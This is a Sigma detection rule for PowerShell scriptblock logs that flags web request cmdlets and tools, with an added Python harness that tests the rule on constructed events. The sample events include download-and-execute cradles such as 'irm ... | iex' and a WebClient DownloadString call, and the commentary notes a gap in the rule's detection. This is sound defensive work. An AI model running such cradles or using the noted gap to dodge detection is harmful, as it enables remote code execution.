Usage Of Web Request Commands And Cmdlets - ScriptBlock
Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs
Sigma rule
title: Usage Of Web Request Commands And Cmdlets - ScriptBlock
id: 1139d2e2-84b1-4226-b445-354492eba8ba
related:
    - id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d
      type: derived
status: test
description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs
references:
    - https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/
    - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell
author: James Pemberton / @4A616D6573
date: 2019-10-24
modified: 2025-07-18
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains:
            - '[System.Net.WebRequest]::create'
            - 'curl '
            - 'Invoke-RestMethod'
            - 'Invoke-WebRequest'
            - ' irm ' # Space before and after to avoid false positives with 'irm' as a substring
            - 'iwr '
            - 'Net.WebClient'
            - 'Resume-BitsTransfer'
            - 'Start-BitsTransfer'
            - 'wget '
            - 'WinHttp.WinHttpRequest'
    filter:
        # Azure VM extension path: the Guest Configuration agent's own scripts fetch content with these cmdlets
        Path|startswith: 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\'
    condition: selection and not filter
falsepositives:
    - Use of the Get-Command and Get-Help cmdlets to reference Invoke-WebRequest and Start-BitsTransfer.
level: medium
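To see what this rule's selection and filter actually do against Script Block Logging (Event ID 4104) records, the following added example reimplements its `selection and not filter` condition in Python and runs it over a handful of constructed events. It is not code from the Sigma project or from the rule's author; a real deployment would compile the rule with pySigma into a SIEM query instead. It assumes only what the rule states: the event fields are `ScriptBlockText` and `Path`, and, as is Sigma's default, `contains` and `startswith` match case-insensitively. The events, hosts and paths below are invented for the demonstration.

```python
"""Evaluate the ScriptBlock web-request rule's detection logic over constructed 4104 events.

Added example, not the Sigma project's code. Field names follow the rule
(ScriptBlockText, Path); matching mirrors Sigma's default case-insensitive
'contains' / 'startswith' modifiers.
"""

# Copied verbatim from the rule's ScriptBlockText|contains list.
SELECTION_CONTAINS = [
    "[System.Net.WebRequest]::create",
    "curl ",
    "Invoke-RestMethod",
    "Invoke-WebRequest",
    " irm ",  # padded with spaces so 'irm' inside another word does not hit
    "iwr ",
    "Net.WebClient",
    "Resume-BitsTransfer",
    "Start-BitsTransfer",
    "wget ",
    "WinHttp.WinHttpRequest",
]

# The rule's Path|startswith exclusion (Azure Guest Configuration extension).
FILTER_PATH_PREFIX = (
    "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\"
)


def matched_pattern(script_block_text: str):
    """Return the first rule string contained in the script block, or None.

    Sigma string matching is case-insensitive by default, so compare lowercased.
    """
    haystack = (script_block_text or "").lower()
    for needle in SELECTION_CONTAINS:
        if needle.lower() in haystack:
            return needle
    return None


def excluded_by_filter(path) -> bool:
    """True when the script's Path sits under the excluded extension directory."""
    return (path or "").lower().startswith(FILTER_PATH_PREFIX.lower())


def rule_fires(event: dict) -> bool:
    """Implements the rule's condition: selection and not filter."""
    hit = matched_pattern(event.get("ScriptBlockText", "")) is not None
    return hit and not excluded_by_filter(event.get("Path"))


# Constructed sample events (hypothetical; not real telemetry). 203.0.113.0/24
# and example.com are reserved documentation values.
SAMPLE_EVENTS = [
    {"id": "webclient", "Path": None,
     "ScriptBlockText": "(New-Object Net.WebClient).DownloadString('http://203.0.113.5/s.ps1')"},
    {"id": "iwr_alias", "Path": None,
     "ScriptBlockText": "iwr https://example.com/a.exe -OutFile a.exe"},
    {"id": "uppercase", "Path": None,
     "ScriptBlockText": "INVOKE-WEBREQUEST -URI HTTPS://EXAMPLE.COM/X"},
    # Documented false positive: help lookups mention the cmdlet name.
    {"id": "get_help", "Path": None,
     "ScriptBlockText": "Get-Help Invoke-WebRequest -Full"},
    # Same download code, but run from the excluded Azure extension path.
    {"id": "guest_config",
     "Path": FILTER_PATH_PREFIX + "bin\\probe.ps1",
     "ScriptBlockText": "(New-Object Net.WebClient).DownloadString('http://203.0.113.5/s.ps1')"},
    # Caveat: ' irm ' needs a leading space, so irm as the very first token is missed.
    {"id": "irm_first_token", "Path": None,
     "ScriptBlockText": "irm https://example.com/p | iex"},
    {"id": "irm_padded", "Path": None,
     "ScriptBlockText": "$x = irm https://example.com/p"},
    {"id": "benign", "Path": None,
     "ScriptBlockText": "Get-Process squirm | Stop-Process"},
]


def evaluate_all(events=SAMPLE_EVENTS) -> dict:
    """Map each constructed event id to whether the rule fires on it."""
    return {e["id"]: rule_fires(e) for e in events}


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(f"{ev['id']:16} fires={rule_fires(ev)!s:5} "
              f"pattern={matched_pattern(ev['ScriptBlockText'])!r}")
```

The `irm_first_token` event is the caveat worth knowing: the padded `' irm '` string deliberately trades a missed hit (alias at the start of a script block, or followed by a tab or newline) for fewer substring false positives, so a one-line `irm ... | iex` downloader only matches here through the `Invoke-RestMethod` it expands to in a later 4104 record, if at all. The `guest_config` event shows that the filter keys on the script's on-disk path, not its content; a script copied into that directory would be excluded too, so that prefix is worth an allow-list review on Azure hosts.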
Related rules
- Potential DLL File Download Via PowerShell Invoke-WebRequest
- Potential Data Exfiltration Activity Via CommandLine Tools
- Usage Of Web Request Commands And Cmdlets
- Malicious PowerShell Commandlets - PoshModule
- Malicious PowerShell Commandlets - ProcessCreation